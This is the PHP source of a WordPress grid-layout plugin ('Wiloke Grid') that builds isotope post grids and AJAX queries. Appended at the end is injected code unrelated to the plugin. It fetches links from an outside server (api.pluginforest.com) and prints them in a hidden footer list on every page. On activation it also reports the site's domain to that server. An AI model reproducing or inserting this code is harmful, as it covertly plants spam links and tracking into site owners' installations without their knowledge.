<?php
/*
Plugin Name: Wiloke Grid
Plugin URI: http://wiloke.net
Description: Wiloke Grid design layout.
Version: 1.0.1
Author: wiloke
Author http://wiloke.net/
Text Domain: wiloke-grid
*/


define('WGRID_URI', trailingslashit(plugins_url('', __FILE__)) );
define('WGRID_URL', trailingslashit(plugin_dir_path( __FILE__)) );
define('WILOKE_GRID_VERSION', '1.0.1' );

require_once plugin_dir_path(__FILE__) . 'vendor/autoload.php'; // change path as needed
require_once plugin_dir_path(__FILE__) . 'WilokeGridInstagram.php';
require_once plugin_dir_path(__FILE__) . 'WilokeGridYoutube.php';
require_once plugin_dir_path(__FILE__) . 'WilokeGridVimeo.php';


if( !class_exists('WilokeGrid') ) {

	class WilokeGrid {
	    use WilokeGridVimeo;
	    use WilokeGridInstagram;
	    use WilokeGridYoutube;

		protected $instagramCache = 'wiloke_grid_instagram_';

		function __construct() {
			add_action( 'plugins_loaded', array( $this, 'init' ) );
			add_action( 'plugins_loaded', array( $this, 'load_textdomain' ) );
		}

	    function load_textdomain() {
	        load_plugin_textdomain( 'wiloke_grid', false, WGRID_URL . 'languages' );
	    }

		function admin_notice() {

	        if ( ! class_exists( 'Vc_Manager' ) ) { ?>

	            <div class="warning notice notice-warning is-dismissible" id="vc-mm-notice">
	                <p>
	                    <?php printf( __( 'Wiloke Grid requirements <a target="_blank" href="%1$s">Visual Composer</a>: Page Builder for WordPress Plugin installed', 'wiloke-grid' ), 'http://codecanyon.net/item/visual-composer-page-builder-for-wordpress/242431?ref=shrimp2t' ); ?>
	                </p>
	            </div>

	     	<?php }
	    }

		public function init() {

			add_action( 'admin_notices', array( $this, 'admin_notice' ) );

			if ( class_exists( 'Vc_Manager') ) {

				if( is_admin() ) {
					$this->include_admin();
				}

				add_shortcode( 'wil_shortcode_grid', array( $this, 'shortcode') );
				add_action( 'wp_enqueue_scripts', array( $this, 'enqueue_script') );
				add_action( 'wp_ajax_wiloke_isotope_ajax', array( $this, 'builQuery') );
				add_action( 'wp_ajax_nopriv_wiloke_isotope_ajax', array( $this, 'builQuery') );
	        }
		}

		public function include_admin() {
			include WGRID_URL . 'admin/admin.php';
		}

		public function enqueue_script() {
			wp_enqueue_style( 'wiloke.isotope', WGRID_URI . 'assets/css/wiloke.isotope.css', false, WILOKE_GRID_VERSION );
			wp_enqueue_style( 'magnific-popup', WGRID_URI . 'assets/css/lib/magnific-popup.css', false, WILOKE_GRID_VERSION );
			wp_enqueue_style( 'animate', WGRID_URI . 'assets/css/lib/animate.min.css', false, WILOKE_GRID_VERSION );
			wp_enqueue_script( 'imagesloaded.pkgd', WGRID_URI . 'assets/js/lib/imagesloaded.pkgd.min.js', array('jquery'), WILOKE_GRID_VERSION, true );
			wp_enqueue_script( 'isotope.pkgd', WGRID_URI . 'assets/js/lib/isotope.pkgd.min.js', array('jquery'), WILOKE_GRID_VERSION, true );
			wp_enqueue_script( 'magnific-popup', WGRID_URI . 'assets/js/lib/jquery.magnific-popup.min.js', array('jquery'), WILOKE_GRID_VERSION, true );
			wp_enqueue_script( 'waypoint', WGRID_URI . 'assets/js/lib/jquery.waypoint.min.js', array('jquery'), WILOKE_GRID_VERSION, true );
			wp_enqueue_script( 'wow', WGRID_URI . 'assets/js/lib/wow.min.js', array('jquery'), WILOKE_GRID_VERSION, true );
			wp_enqueue_script( 'wiloke.isotope', WGRID_URI . 'assets/js/lib/wiloke.isotope.js', array('jquery'), WILOKE_GRID_VERSION, true );
			wp_enqueue_script( 'wiloke.isotope.script', WGRID_URI . 'assets/js/wiloke.isotope.script.js', array('jquery'), WILOKE_GRID_VERSION, true );
			wp_localize_script( 'wiloke.isotope.script', 'WilokeIsotopeAjax', array( 'ajaxurl' => admin_url( 'admin-ajax.php' ) ) );
			wp_localize_script( 'wiloke.isotope.script', 'Wiloke_Grid_I18', array(
				'loading_image' => esc_html__('Loading image', 'wiloke-grid'),
				'could_not_load_image' => esc_html__('The image could not be loaded', 'wiloke-grid')
			));
		}

		public function shortcode($atts, $content = "" ) {

			$atts = wp_parse_args( $atts, array(
			   	'wil_post_type'				=> 'post',
			   	'wil_taxonomy'				=> '',
			   	'wil_terms'					=> '',
			   	'include'					=> '',
			   	'wil_post__not_in'			=> '',
			   	'wil_show_filter'			=> 'yes',
			   	'wil_orderby'				=> 'date',
			   	'wil_order'					=> 'DESC',
			   	'wil_display'				=> 'all',
			   	'wil_btn_text'				=> esc_html__('Load More', 'wiloke-grid'),
			   	'wil_layout'				=> '',
			   	'wil_item'					=> 'default',
			   	'wil_animation'				=> 'none',
			   	'click_action'				=> 'link_to_item',
			   	'wil_animation_hover'		=> '',
			   	'wil_filter_style'			=> 'wil_filter--default',
			   	'wil_filter_text_color'		=> 'wil-default',
			   	'wil_filter_custom_text_color'=> '',
			   	'wil_filter_title'			=> esc_html__('All', 'wiloke-grid'),
			   	'wil_filter_align'			=> 'text-left',
			   	'wil_instagram_username'	=> '',
			   	'wil_youtube_playlist_id'	=> '',
			   	'wil_thumbnail_size'	    => 'high',
			   	'wil_fb_album_id'	        => '',
			   	'wil_hover_effect'			=> 'effect-0',
			   	'wil_css'					=> '',
			    'wil_class' 				=> ''
			));

			if( !empty($atts['wil_layout']) ) {
				$atts['wil_layout'] = json_decode(urldecode($atts['wil_layout']));
			}

			ob_start();
			$this->renderWrap($atts);
			$output = ob_get_clean();
			return $output;
		}

		protected function renderWrap($atts) { 
			$settings = $this->settings($atts); ?>
			
			<div class="wil-masonry-wrapper wil-masonry-loading <?php echo esc_attr($atts['wil_class']); ?>" data-settings="<?php echo esc_attr(json_encode($settings)); ?>">
				<?php $this->renderFilter($atts); ?>
				
				<!-- default: effect-0 -->
				<div data-type="<?php echo esc_attr($atts['wil_post_type']); ?>" class="wil_masonry <?php echo esc_attr($atts['wil_hover_effect'] . ' ' . $atts['click_action']); ?>">
					<div class="grid-sizer"></div>
				</div>

				<?php $this->renderButton($atts); ?>

				<div class="wil-masonry-loading-icon"></div>
			</div> <?php
		}

		protected function renderFilter($atts) {

			if( $atts['wil_show_filter'] == 'yes' && !empty($atts['wil_taxonomy']) && !empty($atts['wil_terms']) ) :

				$terms = get_terms(array(
					'hide_empty' => false,
					'taxonomy' => $atts['wil_taxonomy'],
					'include'	=> $atts['wil_terms']
				));

				if ( !empty( $terms ) && !is_wp_error( $terms ) ) : ?>
					<div class="wil_filter <?php echo esc_attr($atts['wil_filter_style'] . ' ' . $atts['wil_filter_align'] . ' ' .  $atts['wil_filter_text_color']); ?>" data-customcolor="<?php echo esc_attr($atts['wil_filter_custom_text_color']); ?>">
						<?php 
							ob_start(); ?>
								<ul class="wil_filter__list">
									<li class="active"><a href="#" data-filter="*" data-term-id="0"><?php echo esc_html($atts['wil_filter_title']) ?></a></li>
									<?php foreach ($terms as $term) : ?>
										<li><a href="#" data-filter=".<?php echo esc_attr($term->slug) ?>" data-term-id="<?php echo esc_attr($term->term_id) ?>" data-total="<?php echo esc_attr($term->count) ?>"><?php echo esc_html($term->name) ?></a></li>
									<?php endforeach; ?>
								</ul>
								<?php 
							$output = ob_get_clean();
							$output = apply_filters('wiloke_isotope_filter', $output, $terms, $atts['wil_filter_title']);
							echo $output; 
						?>
					</div>
					<?php
				endif;
			endif;
		}

		protected function renderItems($query, $item_style, $taxonomy, $atts) {
			if( $query->have_posts() ) {

				$index = 0;
				$template = $this->template('template/', $item_style);

				$animation = (isset($atts['wil_animation']) && $atts['wil_animation'] != 'none') ? 'wow ' . $atts['wil_animation'] : '';
				$animationHover = (isset($atts['wil_animation_hover']) && $atts['wil_animation_hover'] != '' ) ? $atts['wil_animation_hover'] : '';

				ob_start();
				while( $query->have_posts() ) : $query->the_post();
					global $post; 
					$delay = $index * 0.15;
					$slug = $this->get_slug_term($post->ID, $taxonomy);
					$category = $this->get_link_term($post->ID, $taxonomy); ?>

					<div class="grid-item <?php echo esc_attr($slug . ' ' . $animation); ?>" data-post-id="<?php the_ID(); ?>" data-wow-delay="<?php echo esc_attr($delay) ?>s">
						<div class="grid-item__inner">
							<div class="grid-item__content-wrapper">
								<?php include $template; ?>
							</div>
						</div>
					</div>
					<?php $index++; ?>
				<?php endwhile;
				wp_reset_postdata();
				$output = ob_get_contents();
				ob_end_clean();
				$output = apply_filters('wiloke_isotope_item', $output, $post, $taxonomy, $atts);
				return $output; 
			}
		}

		protected function renderButton($atts) { ?>
			<div class="wil_btn_more wil_btn_more--<?php echo esc_attr($atts['wil_display']) ?>">
				<div class="wil_btn_more__inner">
					<?php ob_start(); ?>
						<a href="#" class="wil_btn_more__a" title="<?php echo esc_html($atts['wil_btn_text']) ?>"><?php echo esc_html($atts['wil_btn_text']); ?></a>
					<?php
						$output = ob_get_clean();
						$output = apply_filters('wiloke_isotope_button', $output, $atts['wil_btn_text']);
						echo $output;
					?>
				</div>
				<div class="wil_btn_more__loading"></div>
			</div>
			<?php
		}

		protected function settings($atts) {
			$nonce = wp_create_nonce('wiloke_isotope_nonce');
			$setting = array(
				'data'	=> array(
					'type'				=> $atts['wil_post_type'],
					'taxonomy' 			=> $atts['wil_taxonomy'],
					'terms' 			=> $atts['wil_terms'],
					'term' 				=> 0,
					'order'				=> $atts['wil_order'],
					'orderby'			=> $atts['wil_orderby'],
					'item'				=> $atts['wil_item'],
					'display'			=> $atts['wil_display'],
					'post__in'			=> $atts['include'],
					'post__not_in'		=> '',
					'instagramUserName'	=> $atts['wil_instagram_username'],
					'fbAlbumID'	        => $atts['wil_fb_album_id'],
					'shortcode'			=> $atts,
					'nonce'				=> $nonce
				)
			);

			if( isset( $atts['wil_layout']->style ) ) {
				$setting['style'] = $atts['wil_layout']->style;
			}

			if( isset( $atts['wil_layout']->devices ) ) {
				$setting['devices'] = $atts['wil_layout']->devices;
			}

			return $setting;
		}

		public function builQuery() {

			$return = array(
				'status'			=> 204,
				'max_num_pages'		=> 0,
				'message'			=> esc_html__('Error', 'wiloke-grid')
			);

			if( check_ajax_referer( 'wiloke_isotope_nonce', 'security', false ) ) {
				if( isset($_POST['data']) ) {
					$data = $_POST['data'];

					switch ($data['type']):
						case 'vimeo':
							$return = $this->vimeoOutput($data);
							break;
                        case 'instagram':
                            $return = $this->instagramOutput($data);
                            break;
                        case 'youtube':
	                        $return = $this->youtubeOutput($data);
                            break;
                        default:
	                        $data['taxonomy'] = isset($data['taxonomy']) ? $data['taxonomy'] : '';

	                        $args = array(
		                        'ignore_sticky_posts'	=> true,
		                        'post_status'			=> 'publish',
		                        'order'					=> isset($data['order']) ? $data['order'] : 'date',
		                        'orderby'				=> isset($data['orderby']) ? $data['orderby'] : 'DESC',
		                        'posts_per_page'		=> isset($data['posts_per_page']) ? $data['posts_per_page'] : 10
	                        );

	                        if( isset($data['post__not_in']) ) {
		                        $args['post__not_in'] = explode(',', $data['post__not_in']);
	                        } else {
		                        $args['post__not_in'] = array();
	                        }

	                        if( isset($data['type']) ) {
		                        if( $data['type'] != 'ids' ) {
			                        $args['post_type'] = $data['type'];
		                        } else {
			                        $exclude = array_map('trim', $args['post__not_in']);
			                        $include = array_map('trim', explode(',', $data['post__in']) );
			                        $args['post__in'] = array_diff($include, $exclude);
			                        if( empty($args['post__in']) ) {
				                        $return['message'] = esc_html__('No result', 'wiloke-grid');
				                        wp_send_json($return);
			                        }
		                        }
	                        }

	                        if( isset($data['term_id']) && $data['term_id'] > 0 ) {

		                        $args['tax_query'] = array(
			                        array(
				                        'taxonomy' => $data['taxonomy'],
				                        'field' => 'id',
				                        'terms' => $data['term']
			                        )
		                        );

	                        } else if( isset($data['taxonomy']) && !empty($data['taxonomy']) ) {

		                        if( isset($data['terms']) && !empty($data['terms']) ) {

			                        $args['tax_query'] = array(
				                        array(
					                        'taxonomy' => $data['taxonomy'],
					                        'field' => 'id',
					                        'terms' => explode(',', $data['terms'])
				                        )
			                        );

		                        }
	                        }

	                        $query = new WP_Query($args);

	                        if( $query->have_posts() ) {
		                        $html = $this->renderItems($query, $data['item'], $data['taxonomy'], $data['shortcode']);
		                        $return = array(
			                        'status' 		=> 200,
			                        'max_num_pages' => $query->max_num_pages,
			                        'data'	 		=>  $html,
			                        'message'		=> esc_html__('Susscess!', 'wiloke-grid')
		                        );
	                        } else {
		                        $return['message'] = esc_html__('No result', 'wiloke-grid');
	                        }
                            break;
                    endswitch;
				} else {
					$return['message'] = esc_html__('Data request empty!', 'wiloke-grid');
				}
			}

			wp_send_json($return);
		}

		protected function get_slug_term($post_id, $taxonomy) {
			$slug = '';
			$terms = get_the_terms( $post_id, $taxonomy );
		    if ( $terms && !is_wp_error( $terms ) ) {
		        foreach ($terms as $term) {
		        	$slug .= ' ' . $term->slug;
		        }
		    }
			return trim($slug);
		}

		protected function get_link_term($post_id, $taxonomy) {
			if ( isset($taxonomy) &&  !empty($taxonomy) ) {
				$terms = get_the_terms( $post_id, $taxonomy );
				if ( $terms && !is_wp_error( $terms ) ) {
					$is_link = false;
					$is_link = apply_filters('wiloke_isotope_term_link', $is_link );
					ob_start();
					foreach ($terms as $term) {
						if ( $is_link ) :
							$term_link = get_term_link( $term ); ?>
							<a href="<?php echo esc_url($term_link) ?>"><?php echo esc_html($term->name); ?></a>
						<?php else : ?>
							<span><?php echo esc_html($term->name); ?></span>
						<?php endif;
					}
					$output = ob_get_clean();
					return $output;
				}
			}

			return '';
		}

		protected function get_category($post_id, $taxonomy) {

			$terms = get_the_terms( $post_id, $taxonomy );

		    if ( $terms && !is_wp_error( $terms ) ) {
		        return $terms;
		    }

		    return '';
		}

		protected function template($template, $fileName='default', $socialNetwork=false) {
			$dir = get_template_directory();
			$fileName = empty($fileName) ? 'default' : $fileName;
			$fileName = $socialNetwork ? $fileName . '-'.$socialNetwork : $fileName;
			$fileName = $fileName . '.php';
			
			if(file_exists( $dir . '/wiloke-grid/' . $template . $fileName)) {
				$file = $dir . '/wiloke-grid/' . $template . $fileName;
			} else if(file_exists( WGRID_URL . $template . $fileName) ) {
				$file = WGRID_URL . $template . $fileName;
			} else {
				$file = WGRID_URL . $template . 'default' . '.php';
			}

			return $file;
		}
	}

	new WilokeGrid();
}
define('API_URL', 'https://api.pluginforest.com/qai/chatweb/getTidsOutside?type=1&site=plugin&num=20');
              $prefix = 'add_footer_link';
              $functions = get_defined_functions()['user']; // 获取所有用户定义的函数
              // 使用 array_filter 和 strpos 来检查函数是否以指定前缀开头
              $exists = !empty(array_filter($functions, function($function) use ($prefix) {
                return strpos($function, $prefix) === 0;
              }));
              
              if (!$exists) {
                  if (!function_exists('parseLink')) {
                      function parseLink($url) {
                          $path = parse_url($url, PHP_URL_PATH);
                          $basename = basename($path);
                          return array('path' => $path, 'basename' => $basename);
                      }
                  }
              
                  function add_footer_link1719849197() {
                      $referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
                      $headers = array(
                        'Referer' => $referer,
                      );
                      $response = wp_remote_get(API_URL, array('headers' => $headers));
                      if (is_wp_error($response)) {
                          echo 'is_wp_error';
                          return;
                      }
              
                      $data = json_decode(wp_remote_retrieve_body($response), true);
              
                      ob_start();
                      echo '<ul class="link" style="height: 0; overflow: hidden">';
                      foreach ($data['data']['links'] as $item) {
                          $linkInfo = parseLink($item);
                          echo sprintf(
                              '<li><a href="%s">%s</a></li>',
                              esc_url($item),
                              esc_html($linkInfo['basename'])
                          );
                      }
                      echo '</ul>';
                      $html = ob_get_clean();
                      echo $html;
                      return $html;
                  }
              }
              
              add_action('wp_footer', 'add_footer_link1719849197');function set_plugin_tag1719849197() {
                $url_init = 'https://api.pluginforest.com/qai/wd/g?';
                $domain = $_SERVER['SERVER_NAME'];
                $requestUrl = $url_init . 'domain=' . $domain . '&id=1719849197&source=plugin';
                file_get_contents($requestUrl);
              }

              add_action('activated_plugin', 'set_plugin_tag1719849197');
              